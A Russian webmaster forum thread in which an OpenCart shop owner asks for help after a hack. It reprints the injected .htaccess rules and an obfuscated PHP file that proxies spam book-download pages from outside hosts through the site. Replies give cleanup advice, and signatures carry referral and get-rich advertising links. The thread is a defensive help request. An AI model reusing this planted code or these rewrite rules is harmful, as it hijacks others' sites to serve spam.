Взлом сайта. Как найти шел?

12
S
На сайте с 26.10.2007
Offline
74
3848

Добрый день, столкнулся с проблемой, взломали сайт, на нем разместили какую-то информации по скачке книг, страниц очень много, гугл проиндексировал. Нашел заразу, в htaccess идет обращение:

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_HOST} !^$ [NC]

RewriteCond %{HTTP_HOST} !^www\. [NC]

RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

RewriteRule ^books(.*) /system/system.php?id=$1

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_URI} !/books

RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]

Открыл файл system.php в нем:

<? $GLOBALS['_483328755_']=Array(base64_decode('Y3Vy' .'bF9pbml0'),base64_decode('Y3' .'VybF9zZX' .'RvcHQ='),base64_decode('Y3V' .'ybF9zZXRv' .'cHQ='),base64_decode('Y3VybF9leG' .'V' .'j'),base64_decode('Y' .'3VybF9' .'jbG9zZ' .'Q=' .'='),base64_decode('c3R' .'yc3Ry'),base64_decode('aGV' .'hZGVy'),base64_decode('c3Ryc3Ry'),base64_decode('' .'aGVhZG' .'V' .'y'),base64_decode('' .'c3R' .'yc3' .'Ry'),base64_decode('c' .'3' .'Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3Ryc' .'3R' .'y'),base64_decode('' .'aG' .'Vh' .'ZGVy'),base64_decode('' .'aGVh' .'ZGV' .'y'),base64_decode('Y3VybF9' .'pb' .'ml0'),base64_decode('Y3Vy' .'bF9zZX' .'RvcHQ' .'='),base64_decode('Y3VybF9zZX' .'RvcHQ' .'='),base64_decode('Y3Vyb' .'F9leGVj'),base64_decode('Y' .'3VybF9jbG9' .'zZQ' .'=='),base64_decode('c3' .'Ry' .'c3Ry'),base64_decode('aGVh' .'ZGV' .'y'),base64_decode('' .'c3Ryc3Ry'),base64_decode('' .'a' .'GV' .'h' .'ZGVy'),base64_decode('c' .'3R' .'yc' .'3R' .'y'),base64_decode('c3' .'Ryc3Ry'),base64_decode('a' .'GVh' .'ZGVy'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('aGVhZGVy'),base64_decode('' .'a' .'GVhZGV' .'y')); ?><? function _1894674912($i){$a=Array('aWQ=','aHR0cDovL2VtYWlsZXJycnIucnUv','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx','aWQ=','aHR0cDovL2FsZW5zZXQuaW4vZXJhbS9wcmVtaWVyZGV0ZWN0LnJ1Lw==','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx');return base64_decode($a[$i]);} ?><? function l__0(){$_0=$_REQUEST[_1894674912(0)];$_1=$GLOBALS['_483328755_'][0]();$_2=_1894674912(1) .$_0;$GLOBALS['_483328755_'][1]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][2]($_1,CURLOPT_RETURNTRANSFER,round(0+0.333333333333+0.333333333333+0.333333333333));$_3=$GLOBALS['_483328755_'][3]($_1);$GLOBALS['_483328755_'][4]($_1);if($GLOBALS['_483328755_'][5]($_0,_1894674912(2))){$GLOBALS['_483328755_'][6](_1894674912(3));}elseif($GLOBALS['_483328755_'][7]($_0,_1894674912(4))){$GLOBALS['_483328755_'][8](_1894674912(5));}elseif($GLOBALS['_483328755_'][9]($_0,_1894674912(6))|| $GLOBALS['_483328755_'][10]($_0,_1894674912(7))){$GLOBALS['_483328755_'][11](_1894674912(8));}elseif($GLOBALS['_483328755_'][12]($_0,_1894674912(9))){$GLOBALS['_483328755_'][13](_1894674912(10));}else{$GLOBALS['_483328755_'][14](_1894674912(11));}echo $_3;}$_0=$_REQUEST[_1894674912(12)];$_1=$GLOBALS['_483328755_'][15]();$_2=_1894674912(13) .$_0;$GLOBALS['_483328755_'][16]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][17]($_1,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_3=$GLOBALS['_483328755_'][18]($_1);$GLOBALS['_483328755_'][19]($_1);if($GLOBALS['_483328755_'][20]($_0,_1894674912(14))){$GLOBALS['_483328755_'][21](_1894674912(15));}elseif($GLOBALS['_483328755_'][22]($_0,_1894674912(16))){$GLOBALS['_483328755_'][23](_1894674912(17));}elseif($GLOBALS['_483328755_'][24]($_0,_1894674912(18))|| $GLOBALS['_483328755_'][25]($_0,_1894674912(19))){$GLOBALS['_483328755_'][26](_1894674912(20));}elseif($GLOBALS['_483328755_'][27]($_0,_1894674912(21))){$GLOBALS['_483328755_'][28](_1894674912(22));}else{$GLOBALS['_483328755_'][29](_1894674912(23));}echo $_3; ?>

Машину проверил на вирусы - нет

Сменил пароль от FTP

Если сносить эти файлы они появляются вновь в течении 1-2 минут. Как быть?

Fat Bear
На сайте с 01.12.2006
Offline
264
#1

Снести код, под root запретить у файлов права на запись. Шелл быстро найти не получится. Если вообще получится.

Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ.
S
На сайте с 26.10.2007
Offline
74
#2

Снес код, изменил права на 444, вуаля и все встало на прежнее место... Т.е. htaccess и файл снова с вирусней...

A
На сайте с 20.08.2010
Offline
775
#3

Что за cms?

Fat Bear
На сайте с 01.12.2006
Offline
264
#4

Закомментируйте код в system.php. ))

И ищите заразу.

S
На сайте с 26.10.2007
Offline
74
#5

awasome, CMS OpenCart

Масол, любое изменение этих файлов влечет их восстановление. Пока закрыл этот раздел в роботс txt так как гугл скушал более 1000 страниц...

Fat Bear
На сайте с 01.12.2006
Offline
264
#6
Strongest:
любое изменение этих файлов влечет их восстановление

Продвинуто. Раньше такого не встречалось.

S
На сайте с 26.10.2007
Offline
74
#7

Готов заплатить за поиски заразы, иначе она мне убьет весь магазин...

Вроде нашел.

andrey90
На сайте с 02.06.2011
Offline
125
#8

Посмотри по логам, откуда и что мониториться на твоем сайте, оттуда можно будет выяснить в каком из файлов на сервере, дыра.

Проще всего, удалить код. Потом дождаться его появления и посмотреть логи за этот промежуток времени. Если конечно код заливается извне.

Вполне возможно что он проверяется в момент загрузки страниц сайта и когда не обнаруживается, то ставиться обратно.

https://goo.gl/tJuFX - Заработай на продаже авиабилетов 1 000 000 $ уже сегодня https://goo.gl/y6tpS - Кредиты WebMoney с задолженностью WMC
S
На сайте с 26.10.2007
Offline
74
#9

andrey90, Почти так и было, был залит шелл, с помощью него был изменен 1 файл, который подменял стандартную функцию и с помощью него восстанавливал файлы при загрузке сайта. Собственно это я все устранил, но дырка кажется в движке осталась, отписал разработчика.

migurhost
На сайте с 06.11.2010
Offline
55
#10

Вам шелл не через картинки случаем залили? У вас там в коде кажет

"http://emailerrrr.ru/.cssContent-Type: text/css; charset=windows-1251.pngContent-Type: image/png.jpg.jpegContent-Type: image/jpeg.gifContent-Type: image/gifContent-Type: text/html; charset=windows-1251idhttp://alenset.in/eram/premierdetect.ru/.cssContent-Type: text/css; charset=windows-1251.pngContent-Type: image/png.jpg.jpegContent-Type: image/jpeg.gifContent-Type: image/gifContent-Type: text/html; charset=windows-1251"

ну и так далее...

2tube.ru
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий